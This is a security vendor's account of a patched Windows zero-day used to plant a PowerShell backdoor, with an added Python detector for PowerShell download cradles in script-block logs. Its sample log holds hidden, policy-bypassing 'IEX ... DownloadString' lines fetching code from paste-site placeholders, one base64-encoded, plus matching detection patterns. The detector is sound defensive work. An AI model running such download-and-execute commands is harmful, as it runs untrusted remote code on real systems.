Kaspersky Lab's automated technologies uncovered a previously unknown vulnerability in Microsoft Windows. The vulnerability was being exploited by an unknown criminal group trying to gain full control over the target device. The attack went after the core of the operating system through a backdoor, and that backdoor was built from a basic, legitimate component of Windows.
Malware that installs a backdoor is particularly dangerous because it gives attackers covert control over the infected device. The privilege escalation needed for this is normally hard to hide from third-party security solutions. But when the malware exploits a previously unknown hole in the system, a zero-day vulnerability, it has a far better chance of operating unnoticed: conventional security solutions cannot recognize the infection and therefore cannot protect the user from a threat that has not yet been identified.
Kaspersky Lab's exploit prevention technology, built to block the exploitation of software vulnerabilities, nevertheless detected the attempt to exploit the unknown Windows vulnerability. The attack scenario was as follows: after a malicious executable file (.exe) was run, installation of the malware began. The malware exploited the zero-day vulnerability to obtain the elevated privileges it needed to persist on the victim's device. It then created a backdoor using a legitimate Windows component: the Windows PowerShell shell, which is present on every device running this operating system. This let the attackers avoid detection and saved them the time of writing their own malicious code. The malware then downloaded a second backdoor through a popular, legitimate text-storage service, giving the criminals complete control over the infected system.
"In this attack we could see two major trends that are often present in advanced persistent threats. The first trend is the use of holes in the computer system to gain more privileges and, thus, to persist on the victim's device. The second is the use of a legitimate framework such as Windows PowerShell for malicious activity on the victim's device. The combination of both approaches allows attackers to bypass conventional security solutions. In order to discover such techniques, companies must use technology that prevents the exploitation of software vulnerabilities in the computer system together with the detection of patterns of behavior," explains Anton Ivanov, security researcher at Kaspersky Lab.
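The behaviour-based detection the quote calls for can be illustrated with a small log check. The following is an added example, not Kaspersky's code or any part of its products: it scans constructed PowerShell script-block log lines (modelled on Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log, which records the text of each script block PowerShell runs) for the pattern described above, where PowerShell fetches a second stage from a public text-storage site and executes it in memory, possibly hidden behind -EncodedCommand. The host list, scoring weights and log-line layout are assumptions made for the example.

```python
"""Flag PowerShell download cradles in script-block log lines.

Added example, not Kaspersky's code. The sample log lines are constructed to
resemble Windows PowerShell script-block events (Event ID 4104). The check
scores the living-off-the-land pattern the article describes: PowerShell
pulling a second stage from a text-storage site and running it in memory.
"""
import base64
import re
from dataclasses import dataclass, field

# Assumed list of text-storage hosts; extend it for your environment.
TEXT_STORAGE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com")

# Indicators of an in-memory download cradle. Each hit is worth one point.
INDICATORS = {
    "download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod", re.I),
    "exec_in_memory": re.compile(r"invoke-expression|\biex\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
}

# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE script).
ENCODED_COMMAND = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    record_id: int
    score: int
    hits: list = field(default_factory=list)
    hosts: list = field(default_factory=list)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload, or '' if there is none."""
    m = ENCODED_COMMAND.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_script_block(record_id, script_text):
    """Score one script block; a score of 0 means nothing suspicious was seen."""
    decoded = decode_encoded_command(script_text)
    corpus = script_text + "\n" + decoded  # scan both the visible and the decoded text
    hits = [name for name, rx in INDICATORS.items() if rx.search(corpus)]
    hosts = [h for h in TEXT_STORAGE_HOSTS if h in corpus.lower()]
    # A text-storage host and an encoded payload weigh more than a lone keyword.
    score = len(hits) + 2 * len(hosts) + (2 if decoded else 0)
    return Finding(record_id, score, hits, hosts)


# Assumed flat log layout; a real pipeline would read Get-WinEvent output.
LOG_LINE = re.compile(r"RecordId=(\d+)\s+EventId=(\d+)\s+ScriptBlockText=(.*)")


def scan_log(lines, threshold=3):
    """Return the Findings at or above threshold for every 4104 event in lines."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m.group(2) != "4104":
            continue
        finding = analyze_script_block(int(m.group(1)), m.group(3))
        if finding.score >= threshold:
            findings.append(finding)
    return findings


# Constructed sample log: one benign block and two variants of the cradle.
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://paste.ee/r/EXAMPLE')"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = [
    "RecordId=101 EventId=4104 ScriptBlockText=Get-Service | Where-Object Status -eq Running",
    "RecordId=102 EventId=4104 ScriptBlockText=powershell -w hidden -ep bypass -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE')\"",
    f"RecordId=103 EventId=4104 ScriptBlockText=powershell -nop -w hidden -EncodedCommand {_ENCODED}",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"record {f.record_id}: score={f.score} hits={f.hits} hosts={f.hosts}")
```

The benign block scores 0 and is dropped; the plain cradle scores 6 and the encoded one 7, because the decoded payload is scanned as well. In production the lines would come from the PowerShell operational log, which only carries script-block text when script block logging is enabled, and the weights would need tuning, since some legitimate installers use the same download-and-execute idiom.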
The vulnerability was reported to Microsoft and fixed in the patch released on April 10, 2019.
Kaspersky Lab advises users to take the following precautions against malware that installs a backdoor through a Windows zero-day vulnerability:
- Once a vulnerability is fixed and the patch is installed, attackers can no longer use it. Install Microsoft's patches for identified vulnerabilities as soon as possible.
- If you are responsible for your organization's security, make sure software is updated as soon as new security patches are available. To automate the process, use security products that include vulnerability assessment and patch management.
- Use a proven security solution that can protect against unknown threats based on observed behavior, such as Kaspersky Endpoint Security.
- Make sure your security team has access to the latest threat intelligence. Private reports on the latest threat developments are available to Kaspersky Intelligence Reporting customers.
- Make sure your staff have basic security-awareness skills.